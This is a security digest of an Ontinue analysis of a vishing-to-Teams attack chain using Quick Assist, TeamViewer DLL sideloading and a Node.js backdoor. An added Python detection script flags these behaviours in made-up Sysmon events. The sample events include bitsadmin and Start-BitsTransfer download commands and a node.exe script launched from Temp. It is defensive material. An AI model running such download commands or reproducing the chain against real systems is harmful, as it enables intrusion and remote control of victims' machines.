Signed. Sideloaded. Compromised!

Summary:
Ontinue’s Cyber Defence Centre (CDC) analyzed a sophisticated, multi-stage attack that effectively combined vishing, remote access tools, and living-off-the-land techniques to infiltrate the victim's system. The threat actor began by leveraging social engineering tactics, specifically vishing, to manipulate the victim into interacting with a malicious PowerShell payload delivered via a Microsoft Teams message. Once the victim executed the PowerShell payload, the attacker escalated their access by utilizing Quick Assist, a legitimate remote support tool, to remotely control the compromised system. This remote access provided the threat actor with a foothold within the environment, from which they deployed signed binaries, such as TeamViewer.exe, alongside a malicious DLL (TV.dll), setting the stage for the next phase of the attack, which involved executing a JavaScript-based C2 backdoor via Node.js to maintain remote access and retrieve malicious commands.

Security Officer Comments:
CDC notes that the attack mirrors tactics commonly associated with the Storm-1811 threat group. Like Storm-1811, the actors combined social engineering tactics such as vishing with trusted tools such as Teams and Quick Assist to evade detection and establish persistent access within the compromised network. Additionally, they used native Windows tools, including BITS jobs and PsExec, to conduct covert data transfers. The attackers also engaged in lateral movement by exploiting compromised credentials to move undetected across the network, further expanding their access. This enabled them to steal sensitive credentials and conduct further reconnaissance. By establishing a persistent C2 connection through the JavaScript backdoor, the attackers were able to send arbitrary commands to the compromised systems at will, allowing them to maintain control and escalate the attack.

Suggested Corrections:
Organizations should conduct regular tabletop exercises to help employees recognize social engineering tactics such as vishing and ensure secure usage of remote access tools. Enforcing strict access controls, including multi-factor authentication, can prevent unauthorized lateral movement and credential theft. Additionally, disabling or closely monitoring the use of native tools like Quick Assist, PsExec and BITS jobs can reduce the overall attack surface. Furthermore, regular patching and the use of endpoint detection and response tools can help identify suspicious activity early, while implementing network segmentation can limit the impact of potential attacks.
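As an added example (not code from the Ontinue write-up), the following Python script applies the monitoring advice above to a handful of constructed Sysmon-style events. It flags the building blocks of the chain described in the summary: a vendor binary loading an unsigned DLL from the same user-writable folder (the TeamViewer.exe / TV.dll sideload), node.exe running a script from a user-writable location, BITS transfers via bitsadmin or Start-BitsTransfer, and PsExec execution. Every path, user name and command line in the sample events is made up, and the rules are illustrative, not Ontinue's detections.

```python
import ntpath
from collections import Counter

# Constructed Sysmon-style events (field names follow Sysmon; values are made up).
SAMPLE_EVENTS = [
    # Vendor binary dropped to Temp loads an unsigned DLL from the same folder -> sideload
    {"EventID": 7, "Image": r"C:\Users\alice\AppData\Local\Temp\TeamViewer.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\TV.dll", "Signed": "false"},
    # Real installation loading its own signed DLL -> benign
    {"EventID": 7, "Image": r"C:\Program Files\TeamViewer\TeamViewer.exe",
     "ImageLoaded": r"C:\Program Files\TeamViewer\TV.dll", "Signed": "true"},
    # node.exe staged in Temp running a script from Temp -> JS backdoor pattern
    {"EventID": 1, "Image": r"C:\Users\alice\AppData\Local\Temp\node.exe",
     "CommandLine": '"node.exe" C:\\Users\\alice\\AppData\\Local\\Temp\\update.js',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # BITS used for a download from the command line
    {"EventID": 1, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": "bitsadmin /transfer job1 http://example.invalid/tools.zip C:\\Users\\Public\\tools.zip",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # BITS used from PowerShell
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Start-BitsTransfer -Source http://example.invalid/a.zip -Destination C:\\Users\\Public\\a.zip",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # PsExec service binary started by the service control manager
    {"EventID": 1, "Image": r"C:\Windows\PSEXESVC.exe",
     "CommandLine": r"C:\Windows\PSEXESVC.exe",
     "ParentImage": r"C:\Windows\System32\services.exe"},
    # Developer running node from its normal install location -> benign
    {"EventID": 1, "Image": r"C:\Program Files\nodejs\node.exe",
     "CommandLine": "node build.js", "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

# Directory prefixes a standard user can write to (assumption: typical Windows layout).
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def in_user_writable(path):
    return path.lower().startswith(USER_WRITABLE)


def rule_dll_sideload(ev):
    """Image load of an unsigned DLL from the loading executable's own user-writable folder."""
    if ev.get("EventID") != 7:
        return None
    exe, dll = ev["Image"], ev["ImageLoaded"]
    same_dir = ntpath.dirname(exe).lower() == ntpath.dirname(dll).lower()
    if same_dir and in_user_writable(dll) and ev.get("Signed", "").lower() == "false":
        return f"{ntpath.basename(exe)} loaded unsigned {ntpath.basename(dll)} from {ntpath.dirname(dll)}"
    return None


def rule_node_script(ev):
    """node.exe running from, or executing a .js file in, a user-writable location."""
    if ev.get("EventID") != 1 or ntpath.basename(ev["Image"]).lower() != "node.exe":
        return None
    args = [a.strip('"') for a in ev.get("CommandLine", "").split()]
    scripts = [a for a in args if a.lower().endswith(".js")]
    if in_user_writable(ev["Image"]) or any(in_user_writable(s) for s in scripts):
        return f"node.exe executed {scripts or '<no script>'} from a user-writable location"
    return None


def rule_bits_transfer(ev):
    """BITS used as a download channel from bitsadmin or PowerShell."""
    if ev.get("EventID") != 1:
        return None
    name = ntpath.basename(ev["Image"]).lower()
    cmd = ev.get("CommandLine", "").lower()
    if name == "bitsadmin.exe" and "/transfer" in cmd:
        return "bitsadmin /transfer used for a file download"
    if name in ("powershell.exe", "pwsh.exe") and "start-bitstransfer" in cmd:
        return "Start-BitsTransfer used for a file download"
    return None


def rule_psexec(ev):
    """PsExec client or its service-side binary."""
    if ev.get("EventID") != 1:
        return None
    name = ntpath.basename(ev["Image"]).lower()
    if name == "psexesvc.exe" or name.startswith("psexec"):
        return "PsExec execution observed"
    return None


RULES = {
    "dll_sideload": rule_dll_sideload,
    "node_script": rule_node_script,
    "bits_transfer": rule_bits_transfer,
    "psexec": rule_psexec,
}


def scan(events):
    """Return (event_index, rule_name, detail) for every rule that fires."""
    findings = []
    for idx, ev in enumerate(events):
        for rule_name, rule in RULES.items():
            detail = rule(ev)
            if detail:
                findings.append((idx, rule_name, detail))
    return findings


def summarize(findings):
    """Count hits per rule; several different rules on one host point to the full chain."""
    return Counter(rule_name for _, rule_name, _ in findings)


if __name__ == "__main__":
    for idx, rule_name, detail in scan(SAMPLE_EVENTS):
        print(f"event {idx}: [{rule_name}] {detail}")
```

The two benign events (the installed TeamViewer loading its own signed DLL, and node.exe run from its normal install directory) produce no hits, which is the point of keying the sideload rule on the DLL's signature state and the executable's location rather than on file names alone: a renamed copy of a signed binary in a Temp folder is suspicious, the vendor's own installation is not.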

Link(s):
https://www.ontinue.com/resource/blog-signed-sideloaded-compromised/